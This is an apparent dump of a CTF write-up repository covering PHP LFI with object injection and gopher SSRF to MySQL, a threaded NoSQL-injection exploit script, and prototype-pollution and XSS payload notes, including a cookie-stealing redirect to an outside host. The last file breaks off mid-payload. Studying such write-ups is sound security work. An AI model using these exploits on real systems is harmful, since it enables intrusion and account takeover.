111 | 5 > > RETURN null
112 |
113 | 7 6 > FETCH_DIM_R $5 !0, 3
114 | 7 FETCH_DIM_R $6 !0, 5
115 | 8 IS_NOT_IDENTICAL ~7 $5, $6
116 | 9 > JMPZ_EX ~7 ~7, ->14
117 | 10 > FETCH_DIM_R $8 !0, 5
118 | 11 FETCH_DIM_R $9 !0, 7
119 | 12 IS_NOT_EQUAL ~10 $8, $9
120 | 13 BOOL ~7 ~10
121 | 14 > > JMPZ_EX ~7 ~7, ->20
122 | 15 > FETCH_DIM_R $11 !0, 0
123 | 16 FETCH_DIM_R $12 !0, 1
124 | 17 MUL ~13 $11, $12
125 | 18 IS_NOT_IDENTICAL ~14 ~13, 30
126 | 19 BOOL ~7 ~14
127 | 20 > > JMPZ ~7, ->22
128 | 21 > > RETURN null
129 |
130 | 8 22 > FETCH_DIM_R $15 !0, 1
131 | 23 FETCH_DIM_R $16 !0, 2
132 | 24 FETCH_DIM_R $17 !0, 6
133 | 25 ADD ~18 $16, $17
134 | 26 IS_NOT_EQUAL ~19 $15, ~18
135 | 27 > JMPZ_EX ~19 ~19, ->34
136 | 28 > FETCH_DIM_R $20 !0, 3
137 | 29 FETCH_DIM_R $21 !0, 0
138 | 30 FETCH_DIM_R $22 !0, 2
139 | 31 ADD ~23 $21, $22
140 | 32 IS_NOT_EQUAL ~24 $20, ~23
141 | 33 BOOL ~19 ~24
142 | 34 > > JMPZ ~19, ->36
143 | 35 > > RETURN null
144 |
145 | 9 36 > INIT_FCALL 'md5'
146 | 37 CONCAT ~25 'a', !0
147 | 38 CONCAT ~26 ~25, 'a'
148 | 39 SEND_VAL ~26
149 | 40 DO_ICALL $27
150 | 41 IS_NOT_EQUAL ~28 $27, 0
151 | 42 > JMPZ ~28, ->44
152 | 43 > > RETURN null
153 | 11 44 > > RETURN !1
154 | 12 45* > RETURN null
155 | End of function getflag
156 | ```
157 | to
158 | ```php
159 | 100) die('nope');
186 |
187 | eval($k);
188 |
189 | highlight_file(__FILE__);
190 | ```
191 | my payload : ``http://89.38.210.129:8095/?k=$a=_G;$a{2}=E;$a{3}=T;${$a}{b}(${$a}{c});&b=highlight_file&c=flag.php``
192 |
193 | a piece of cake =)
194 |
195 | ### YAPS2 (350pts)
196 | YAPS2 is open_basedir and disable_functions bypass challenge.
197 |
--------------------------------------------------------------------------------
/2019/19Cyberoc/19Cyberoc - Secret Service (Hidden Service) Write up.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2019/19Cyberoc/19Cyberoc - Secret Service (Hidden Service) Write up.pdf
--------------------------------------------------------------------------------
/2019/19Cyberoc/README.md:
--------------------------------------------------------------------------------
1 | ## 19Cyberoc - Secret Service (Hidden Service)
2 |
3 | ```
4 | Uneducated people (Junior 1st)
5 |
6 | Cyberoc19 (2019 Whitehat Contest) - Secret Service Write up
7 | Written by munsiwoo (mun.xiwoo@gmail.com)
8 | ```
9 |
10 |
11 |
12 | ### Source leak (LFI + PHP Wrapper)
13 |
14 | 문제에서는 `index.php`의 소스 일부를 제공한다. 해당 소스를 보면 간단한 미티게이션을 우회하고 `LFI`가 가능하다. `LFI`를 `PHP Wrapper`와 연계해서 `index.php`, `config.php`, `helper.php`, `dbconn.php` 등 다양한 소스를 얻을 수 있었다. (미티게이션 우회는 정규식 필터링이 미흡하므로 `php://`에서 `php`대신 `PHP`를 사용하면 된다.)
15 |
16 | ```php
17 | SimpleRouter::post("/intra/view", function() {
18 | $service = input("service", false, "post");
19 | if($service === false)
20 | return "No such service";
21 |
22 | chdir("intra");
23 | $service = str_replace("_", "/", $service);
24 | if(strpos($service, '/') === 0 || preg_match("/^.*(\\.\\.|php).*$/", $service))
25 | return "Don't cheat!";
26 |
27 | include $service.".php";
28 | chdir("..");
29 | });
30 | ```
31 |
32 | ```
33 | service=PHP://filter/convert.base64-encode/resource=index
34 | ```
35 |
36 |
37 |
38 | ### Attack scenario
39 |
40 | 1\. `dbconn.php`에는 MySQL 연결 정보가 담겨있는데, 패스워드 부분이 비어있는걸 볼 수 있다.
41 | 여기서 "`SSRF`를 통해 `gopher://`를 사용하면 직접 DB에 접근할 수 있겠다." 라고 생각했다.
42 |
43 | 2\. `config.php`을 보면 `ReportModule`, `LogModule` 이렇게 2개의 클래스가 정의되어 있다.
44 | `ReportModule`의 `send_real` 메소드에서는 `SSRF`가 가능해보였다.
45 |
46 | ```php
47 | # ReportModule Class
48 | public function send_report() {
49 | return $this->send_real();
50 | }
51 | private function send_real() {
52 | $target_host = parse_url($this->target, PHP_URL_HOST);
53 | if($target_host !== "localhost")
54 | return "Report can only be sent to localhost";
55 |
56 | $curl= curl_init();
57 | curl_setopt($curl, CURLOPT_URL, $this->target);
58 | $res = curl_exec($curl);
59 | curl_close($curl);
60 |
61 | return $res;
62 | }
63 | ```
64 |
65 | 3\. 단 `ReportModule`을 사용하려면 `LogModule`의 특정 메소드(set_rpt_module)를 호출해야 했고, 해당 메소드를 직접적으로 호출하는 코드는 없었다. 따라서 unserialize함수나 phar:// 등을 사용해 `Object Injection`을 해야겠다고 생각했다.
66 |
67 | ```php
68 | # LogModule Class
69 | public function set_rpt_module($custom_module) {
70 | if(!method_exists($custom_module, "send_report"))
71 | return false;
72 | $this->rpt_module = $custom_module;
73 | return true;
74 | }
75 | public function __destruct() {
76 | if($this->rpt_module == null || !method_exists($this->rpt_module, "send_report"))
77 | return;
78 |
79 | $log_string = "REPORT_LOG";
80 | $this->write_line($log_string." - ".$this->rpt_module->send_report());
81 | }
82 | ```
83 |
84 | 4\. unserialize 함수를 사용하거나 phar://을 사용할 부분은 딱히 보이지 않았다. 도중 `config.php`에 상단에 있는 ini_set과, `/info`로 접속하면 보여주는 phpinfo 페이지를 보니 세션에 원하는 데이터를 넣고 세션을 역직렬화하는 과정에서 `Object Injection`이 가능해 보였다. (자세한 설명은 아래에서)
85 |
86 |
87 |
88 | ### PHP session.upload_progress option
89 |
90 | PHP는 업로드 중인 개별 파일의 업로드 진행률을 추적할 수 있도록 `upload_progress` 옵션을 제공한다.
91 | `session.upload_progress.enabled`, `session.upload_progress.cleanup` 이렇게 2개의 옵션은 기본적으로 `On`으로 설정되어 있는데 `session.upload_progress.enabled`가 활성화되어 있으면 `session_start()` 없이 세션을 생성할 수 있다. (업로드 진행률 추적을 위해 세션을 사용) 단, `session.upload_progress.cleanup` 옵션이 `On`으로 활성화되어 있다면 진행률 추적에 쓰인 세션 파일은 자동으로 삭제된다.
92 |
93 | 반대로 `session.upload_progress.cleanup` 가 `Off`라면 `session_start()` 없이 내가 원하는 값을 포함한 세션 파일을 생성하고 유지할 수 있다는 의미다.
94 |
95 | ```
96 | session.upload_progress.enabled = On
97 | session.upload_progress.cleanup = Off
98 | ```
99 |
100 | 문제 또한 위와 같이 설정되어 있었으므로 아래 요청으로 세션에 원하는 데이터를 넣을 수 있었다.
101 |
102 | ```
103 | ------WebKitFormBoundaryUmsB8xWbmldnarAQ
104 | Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
105 |
106 | munsiwoo
107 | ------WebKitFormBoundaryUmsB8xWbmldnarAQ
108 | Content-Disposition: form-data; name="file"; filename="abcd"
109 | Content-Type: text/plain
110 |
111 | ------WebKitFormBoundaryUmsB8xWbmldnarAQ--
112 | ```
113 |
114 |
115 |
116 | ### PHP session.serialize_handler option
117 |
118 | PHP에서 **session.serialize_handler** 옵션은 세션의 핸들러를 지정해주는 옵션이다.
119 | 어떤 방식으로 직렬화, 역직렬화 할지 설정할 수 있으며 기본값은 `php`다.
120 | `php` 말고도 `php_binary`, `php_serialize`, `wddx` 옵션이 있다.
121 |
122 | ```
123 | Local Value : session.serialize_handler = php
124 | Master Value : session.serialize_handler = php_serialize
125 | ```
126 |
127 | 문제는 위와 같이 `php.ini`에서는 `php_serialize`로 설정해놨고
128 | PHP 페이지에서는 `ini_set()`을 통해 `php`로 재설정했다.
129 | 즉, 세션을 직렬화해서 파일에 쓸 때와 읽어서 역직렬화 할 때 서로 다른 방식으로 진행할 수 있다는 것이다.
130 |
131 |
132 |
133 | ### Proof of Concept
134 |
135 | 우선 PHP에 `Object Injection`에 성공한다면 Code Execution이 가능하도록 클래스 하나를 만들어준다.
136 |
137 | ```php
138 | class A {
139 | public $cmd;
140 | function __destruct() {
141 | eval($this->cmd);
142 | }
143 | }
144 | ```
145 |
146 |
147 | 또한 세션 파일에 내가 원하는 데이터를 포함시킬 수 있도록 `php.ini`에서 다음과 같이 설정해준다.
148 |
149 | ```
150 | session.upload_progress.enabled = On
151 | session.upload_progress.cleanup = Off
152 | ```
153 |
154 | 위와 같이 설정되어 있을 때 아래 내용으로 `POST` 요청을 하면 세션 파일이 생성되는걸 볼 수 있다.
155 |
156 | ```
157 | ------WebKitFormBoundaryUmsB8xWbmldnarAQ
158 | Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
159 |
160 | munsiwoo
161 | ------WebKitFormBoundaryUmsB8xWbmldnarAQ
162 | Content-Disposition: form-data; name="file"; filename="|O:1:\\"A\\":1:{s:3:\\"cmd\\";s:10:\\"phpinfo();\\";}"
163 | Content-Type: text/plain
164 |
165 | ------WebKitFormBoundaryUmsB8xWbmldnarAQ--
166 | ```
167 |
168 | #### session.serialize_handler에 따른 세션 값 차이
169 |
170 | * Local Value, Master Value 둘다`php`일 때
171 |
172 | ```
173 | upload_progress_abc|a:5:{s:10:"start_time";i:1568682523;s:14:"content_length";i:331;s:15:"bytes_processed";i:331;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:3:"abc";s:4:"name";s:41:"|O:1:"A":1:{s:3:"cmd";s:10:"phpinfo();";}";s:8:"tmp_name";s:14:"/tmp/phpHEOzEC";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1568682523;s:15:"bytes_processed";i:5;}}}
174 | ```
175 |
176 | * Local Value, Master Value 둘다 `php_serialize`일 때
177 |
178 | ```
179 | a:1:{s:19:"upload_progress_abc";a:5:{s:10:"start_time";i:1568682633;s:14:"content_length";i:331;s:15:"bytes_processed";i:331;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:3:"abc";s:4:"name";s:41:"|O:1:"A":1:{s:3:"cmd";s:10:"phpinfo();";}";s:8:"tmp_name";s:14:"/tmp/phpz5NId3";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1568682633;s:15:"bytes_processed";i:5;}}}}
180 | ```
181 |
182 | 우선 위 세션 데이터 모두 `session_start()`를 해도 `phpinfo()` 실행은 안 된다.
183 | 다만 `php_serialize`일 때 직렬화된 값에서 `ini_set()`로 **session.serialize_handler**을 `php`로 변경해주고 `session_start()`를 하면 정상적으로 `phpinfo()`가 실행되면서 세션 데이터는 아래로 바뀐다.
184 |
185 | ```
186 | a:1:{s:19:"upload_progress_abc";a:5:{s:10:"start_time";i:1568682633;s:14:"content_length";i:331;s:15:"bytes_processed";i:331;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:3:"abc";s:4:"name";s:41:"|O:1:"A":1:{s:3:"cmd";s:10:"phpinfo();";}
187 | ```
188 |
189 | ```php
190 | cmd);
197 | }
198 | }
199 |
200 | session_start();
201 | ```
202 |
203 | 이유는 `php` 옵션은 `|` 파이프 문자로 세션 명과 세션 데이터를 구분하고 (`a|i:1234;`)
204 | `php_serialize` 옵션은 세션 명과 세션 데이터를 `array`로 구분한다. (`a:1:{s:1:"a";i:1234;}`)
205 |
206 | ```
207 | a:1:{s:19:"upload_progress_abc";a:5:{s:10:"start_time";i:1568683023;s:14:"content_length";i:331;s:15:"bytes_processed";i:331;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:3:"abc";s:4:"name";s:41:"|O:1:"A":1:{s:3:"cmd";s:10:"phpinfo();";}
208 | ```
209 |
210 | 위와 같이 `php_serialize` 방식으로 직렬화된 세션 데이터를 `php` 방식으로 역직렬화한다면
211 |
212 | ```
213 | array(1) {
214 | ["a:1:{s:19:"upload_progress_abc";a:5:{s:10:"start_time";i:1568683023;s:14:"content_length";i:331;s:15:"bytes_processed";i:331;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:3:"abc";s:4:"name";s:41:""]=>
215 | object(__PHP_Incomplete_Class)#1 (2) {
216 | ["__PHP_Incomplete_Class_Name"]=>
217 | string(1) "A"
218 | ["cmd"]=>
219 | string(10) "phpinfo();"
220 | }
221 | }
222 | ```
223 |
224 | 이렇게 `|` 가 나오기 전까지는 세션명으로 인식하고 그 후는 세션 데이터로 인식하면서 성공적으로 `Object Injection`을 할 수 있게된다.
225 |
226 |
227 |
228 | ### Exploit
229 |
230 | ```php
231 | target = 'gopher://localhost:3306/_%a7%00%00%01%85%a2%1e%00%00%00%00%40%08%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%69%6e%74%72%61%5f%6d%61%6e%61%67%65%72%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%61%03%5f%6f%73%09%64%65%62%69%61%6e%36%2e%30%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%32%33%34%34%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%08%35%2e%36%2e%36%2d%6d%39%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%03%66%6f%6f%03%62%61%72%35%00%00%00%03%73%65%6c%65%63%74%20%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%76%61%6c%75%65%29%20%66%72%6f%6d%20%69%6e%74%72%61%5f%64%61%74%61%2e%70%61%73%73%77%6f%72%64%3b%01%00%00%00%01';
240 |
241 | $log_module = new LogModule();
242 | $log_module->filename = 'log/munsiwoo123';
243 | $log_module->rpt_module = $rpt_module;
244 |
245 | echo '|'.str_replace('"', '\\\\"', serialize($log_module));
246 |
247 | ```
248 |
249 | `gopher://localhost:3306/_`뒤에 붙는 데이터는 MySQL 쿼리를 직접 요청할 수 있는 Raw data다. 위에서는 `select group_concat(value) from intra_data.password;` 를 요청하도록 생성했다.
250 |
251 | PHP를 실행해서 나온 직렬화된 데이터를 filename에 담아서 세션 데이터에 포함시켜 세션을 생성한다.
252 |
253 | ```python
254 | import requests as req
255 | # made by munsiwoo
256 |
257 | contents = """------WebKitFormBoundaryUmsB8xWbmldnarAQ
258 | Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
259 |
260 | munsiwoo
261 | ------WebKitFormBoundaryUmsB8xWbmldnarAQ
262 | Content-Disposition: form-data; name="file"; filename="|O:9:\\"LogModule\\":2:{s:8:\\"filename\\";s:15:\\"log/munsiwoo123\\";s:10:\\"rpt_module\\";O:12:\\"ReportModule\\":1:{s:6:\\"target\\";s:724:\\"gopher://localhost:3306/_%a7%00%00%01%85%a2%1e%00%00%00%00%40%08%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%69%6e%74%72%61%5f%6d%61%6e%61%67%65%72%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%61%03%5f%6f%73%09%64%65%62%69%61%6e%36%2e%30%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%32%33%34%34%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%08%35%2e%36%2e%36%2d%6d%39%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%03%66%6f%6f%03%62%61%72%35%00%00%00%03%73%65%6c%65%63%74%20%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%76%61%6c%75%65%29%20%66%72%6f%6d%20%69%6e%74%72%61%5f%64%61%74%61%2e%70%61%73%73%77%6f%72%64%3b%01%00%00%00%01\\";}}"
263 | Content-Type: text/plain
264 |
265 | ------WebKitFormBoundaryUmsB8xWbmldnarAQ--"""
266 |
267 | if __name__ == '__main__' :
268 | url = "http://13.209.230.31/admin"
269 |
270 | headers = {
271 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryUmsB8xWbmldnarAQ",
272 | "Cookie": "PHPSESSID=munsiwoo"
273 | }
274 |
275 | req.post(url, headers=headers, data=contents)
276 | result = req.get(url, headers=headers).text
277 |
278 | print(result, flush=True)
279 | ```
280 |
281 | 
282 |
283 |
284 |
285 | ### Reference
286 |
287 | [https://blog.orange.tw/2018/10/hitcon-ctf-2018-one-line-php-challenge.html](https://blog.orange.tw/2018/10/hitcon-ctf-2018-one-line-php-challenge.html "https://blog.orange.tw/2018/10/hitcon-ctf-2018-one-line-php-challenge.html")
288 | [http://wonderkun.cc/index.html/?p=718](http://wonderkun.cc/index.html/?p=718 "http://wonderkun.cc/index.html/?p=718")
289 | [https://blog.spoock.com/2016/10/16/php-serialize-problem/](https://blog.spoock.com/2016/10/16/php-serialize-problem/ "https://blog.spoock.com/2016/10/16/php-serialize-problem/")
290 | [https://gist.github.com/chtg/f74965bfea764d9c9698](https://gist.github.com/chtg/f74965bfea764d9c9698 "https://gist.github.com/chtg/f74965bfea764d9c9698")
291 | [https://www.zzfly.net/ctf-serialize/](https://www.zzfly.net/ctf-serialize/ "https://www.zzfly.net/ctf-serialize/")
292 | [https://bugs.php.net/bug.php?id=71101](https://bugs.php.net/bug.php?id=71101 "https://bugs.php.net/bug.php?id=71101")
293 | [https://bugs.php.net/bug.php?id=72681](https://bugs.php.net/bug.php?id=72681 "https://bugs.php.net/bug.php?id=72681")
294 | [https://www.php.net/manual/en/session.upload-progress.php](https://www.php.net/manual/en/session.upload-progress.php "https://www.php.net/manual/en/session.upload-progress.php")
295 | [https://www.php.net/manual/en/session.configuration.php#ini.session.serialize-handler](https://www.php.net/manual/en/session.configuration.php#ini.session.serialize-handler "https://www.php.net/manual/en/session.configuration.php#ini.session.serialize-handler")
296 |
--------------------------------------------------------------------------------
/2019/19Cyberoc/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2019/19Cyberoc/flag.png
--------------------------------------------------------------------------------
/2020/Defenit_CTF/web1-fortune-cookie/exploit.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import threading
3 |
4 | def overwrite_floor_func() :
5 | headers = {
6 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
7 | "Accept-Encoding": "gzip, deflate",
8 | "Accept-Language": "ko,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,la;q=0.5,und;q=0.4,lb;q=0.3,vi;q=0.2",
9 | "Cache-Control": "no-cache",
10 | "Connection": "keep-alive",
11 | "Cookie": 'user=s%3Aj%3A%7B%22%24where%22%3A%22(Math.floor%3Dfunction()%7Breturn%206969%7D)%26%260%22%7D.IoORcQjJrlGyo1KJ2%2BFpUOvvcNwJ6bTB4J2n%2FuoLtEw',
12 | "Host": "fortune-cookie.ctf.defenit.kr",
13 | "Pragma": "no-cache",
14 | "Referer": "http://fortune-cookie.ctf.defenit.kr/",
15 | "Upgrade-Insecure-Requests": "1",
16 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
17 | }
18 | cookies = {"user": 's%3Aj%3A%7B%22%24where%22%3A%22(Math.floor%3Dfunction()%7Breturn%206969%7D)%26%260%22%7D.IoORcQjJrlGyo1KJ2%2BFpUOvvcNwJ6bTB4J2n%2FuoLtEw'}
19 | print(requests.get("http://fortune-cookie.ctf.defenit.kr/posts", headers=headers, cookies=cookies))
20 |
21 | def get_flag() :
22 | headers = {
23 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
24 | "Accept-Encoding": "gzip, deflate",
25 | "Accept-Language": "ko,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,la;q=0.5,und;q=0.4,lb;q=0.3,vi;q=0.2",
26 | "Cache-Control": "no-cache",
27 | "Connection": "keep-alive",
28 | "Cookie": "user=s%3Aj%3A%7B%22%24where%22%3A%22this.author%3D%3D%3D'zuuuzi'%22%7D.nmTSqk3He9NUQpTKov%2Bxivt9o%2F8fL6xG9e3LmSiJgfw",
29 | "Host": "fortune-cookie.ctf.defenit.kr",
30 | "Pragma": "no-cache",
31 | "Referer": "http://fortune-cookie.ctf.defenit.kr/",
32 | "Upgrade-Insecure-Requests": "1",
33 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
34 | }
35 | print(requests.get("http://fortune-cookie.ctf.defenit.kr/flag?favoriteNumber=6969", headers=headers).text)
36 |
37 | th1, th2 = [], []
38 |
39 | for i in range(100) :
40 | th1.append(threading.Thread(target=overwrite_floor_func, args=()))
41 | th2.append(threading.Thread(target=get_flag, args=()))
42 |
43 | for i in range(100) :
44 | th1[i].start()
45 |
46 | for i in range(100) :
47 | th2[i].start()
--------------------------------------------------------------------------------
/2020/Defenit_CTF/web2-highlighter/tq.txt:
--------------------------------------------------------------------------------
1 | 삽질했던거 정리
2 |
3 | prob site : http://highlighter.ctf.defenit.kr/
4 |
5 |
6 | function pwn(a,b) {
7 | var post = a;
8 | var keyword = b;
9 | chrome.runtime.sendMessage(
10 | { content: post, keyword },
11 | function (response) {
12 | console.log(response);
13 | }
14 | );
15 | }
16 |
17 | ({})['__proto__']['__defineGetter__']('foo',function(){return 'x';})
18 |
19 | pwn(`n`,`({})['__proto__']['__defineGetter__']('polluted',function(){return'xxx';})`);
20 | pwn(`n`,`({})['__proto__']['__defineGetter__']('foo',function(){return 'x';})`);
21 |
22 |
23 |
24 |
25 |
26 | ({})['__proto__']['__defineGetter__']('foo',function(){return(document.body.innerHTML='[payload]')})
27 |
28 |
29 |
30 |
31 | step 1. prototype pollution
32 | ({})['__proto__']['__defineGetter__']('polluted',function(){return'\x3cimg\x20src="x"\x20onerror=alert(1)>';})
33 |
34 |
35 |
36 |
37 |
38 |
39 | step 2. dompurify bypass (SAFE_FOR_JQUERY : TRUE 일 때):
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
">
48 |
49 | http://highlighter.ctf.defenit.kr/read?id=115#({})['__proto__']['__defineGetter__']('foo',function(){return(n('aaaa'));})
50 |
51 |
52 |
53 |
54 | pwn(`n`,`({})['__proto__']['__defineGetter__']('foo',function(){return'
';})`);
55 |
56 |
57 |
58 | pwn(`n`,`({})['__proto__']['__defineGetter__']('foo',function(){return'\x3c\x69\x6d\x67\x20\x61\x6c\x74\x3d\x22\x3c\x78\x22\x20\x74\x69\x74\x6c\x65\x3d\x22\x2f\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x78\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x22\x3e';})`);
59 |
60 |
61 |
62 |
63 |
64 |
65 | step 3. xss :
66 |
67 | #({})['__proto__']['__defineGetter__']('foo',function(){return(document.body.innerHTML='\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x6f\x2f\x6f\x61\x75\x74\x68\x32\x2f\x72\x65\x76\x6f\x6b\x65\x3f\x63\x61\x6c\x6c\x62\x61\x63\x6b\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3b\x61\x6c\x65\x72\x74\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e')})
68 |
69 |
70 | http://highlighter.ctf.defenit.kr/read?id=72#({})['__proto__']['__defineGetter__']('foo',function(){return(document.body.innerHTML='\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x6f\x2f\x6f\x61\x75\x74\x68\x32\x2f\x72\x65\x76\x6f\x6b\x65\x3f\x63\x61\x6c\x6c\x62\x61\x63\x6b\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3b\x61\x6c\x65\x72\x74\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e')})
71 |
72 |
73 | http://highlighter.ctf.defenit.kr/read?id=115#({})['__proto__']['__defineGetter__']('foo',function(){return'\x3c\x69\x6d\x67\x20\x61\x6c\x74\x3d\x22\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x2f\x2f\x22\x20\x74\x69\x74\x6c\x65\x3d\x22\x2f\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x78\x20\x78\x6e\x65\x72\x72\x6f\x72\x3d\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x20\x73\x70\x61\x6e\x3d\x22\x3c\x78\x22\x20\x6f\x3e\x22';})
74 |
75 |
76 |
77 |
78 | reference :
79 |
80 |
81 | https://blog.p6.is/bypassing-a-js-sandbox/
82 |
83 | https://research.securitum.com/dompurify-bypass-using-mxss/
84 |
85 | https://masatokinugawa.l0.cm/
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 | ---
94 |
95 | payload
96 |
97 | ({})['__proto__']['__defineGetter__']('foo',function(){return'
"';})
98 |
99 |
100 | http://highlighter.ctf.defenit.kr/read?id=115#({})['__proto__']['__defineGetter__']('foo',function(){return'\x3c\x69\x6d\x67\x20\x61\x6c\x74\x3d\x22\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x2f\x2f\x22\x20\x74\x69\x74\x6c\x65\x3d\x22\x2f\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x78\x20\x78\x6e\x65\x72\x72\x6f\x72\x3d\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x20\x73\x70\x61\x6e\x3d\x22\x3c\x78\x22\x20\x6f\x3e\x22';})
101 |
102 |
103 |
104 | takeover admin account
105 |
106 | \x3c\x69\x6d\x67\x20\x61\x6c\x74\x3d\x22\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x3d\x60\x2f\x2f\x77\x69\x74\x68\x70\x68\x70\x2e\x63\x6f\x6d\x3a\x38\x30\x38\x30\x2f\x3f\x60\x2b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x2f\x2f\x22\x20\x74\x69\x74\x6c\x65\x3d\x22\x2f\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x78\x20\x78\x6e\x65\x72\x72\x6f\x72\x3d\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x20\x73\x70\x61\x6e\x3d\x22\x3c\x78\x22\x20\x6f\x3e\x22
107 |
108 | http://highlighter.ctf.defenit.kr/read?id=115#({})['__proto__']['__defineGetter__']('foo',function(){return'\x3c\x69\x6d\x67\x20\x61\x6c\x74\x3d\x22\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x3d\x60\x2f\x2f\x77\x69\x74\x68\x70\x68\x70\x2e\x63\x6f\x6d\x3a\x38\x30\x38\x30\x2f\x3f\x60\x2b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x2f\x2f\x22\x20\x74\x69\x74\x6c\x65\x3d\x22\x2f\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x78\x20\x78\x6e\x65\x72\x72\x6f\x72\x3d\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x20\x73\x70\x61\x6e\x3d\x22\x3c\x78\x22\x20\x6f\x3e\x22';})
109 |
110 | http://highlighter.ctf.defenit.kr/read?id=34#({})['__proto__']['__defineGetter__']('foo',function(){return'\x3c\x69\x6d\x67\x20\x61\x6c\x74\x3d\x22\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x65\x76\x61\x6c\x28\x61\x74\x6f\x62\x28\x60\x64\x6d\x46\x79\x49\x48\x4a\x6c\x63\x53\x41\x39\x49\x47\x35\x6c\x64\x79\x42\x59\x54\x55\x78\x49\x64\x48\x52\x77\x55\x6d\x56\x78\x64\x57\x56\x7a\x64\x43\x67\x70\x4f\x77\x70\x79\x5a\x58\x45\x75\x62\x33\x42\x6c\x62\x69\x67\x69\x52\x30\x56\x55\x49\x69\x77\x67\x49\x6d\x5a\x70\x62\x47\x55\x36\x4c\x79\x38\x76\x63\x6d\x56\x6b\x59\x57\x4e\x30\x5a\x57\x51\x76\x5a\x6d\x78\x68\x5a\x79\x49\x73\x49\x47\x5a\x68\x62\x48\x4e\x6c\x4b\x54\x73\x4b\x63\x6d\x56\x78\x4c\x6e\x4e\x6c\x62\x6d\x51\x6f\x4b\x54\x73\x4b\x62\x47\x39\x6a\x59\x58\x52\x70\x62\x32\x34\x39\x49\x6d\x68\x30\x64\x48\x41\x36\x4c\x79\x39\x33\x61\x58\x52\x6f\x63\x47\x68\x77\x4c\x6d\x4e\x76\x62\x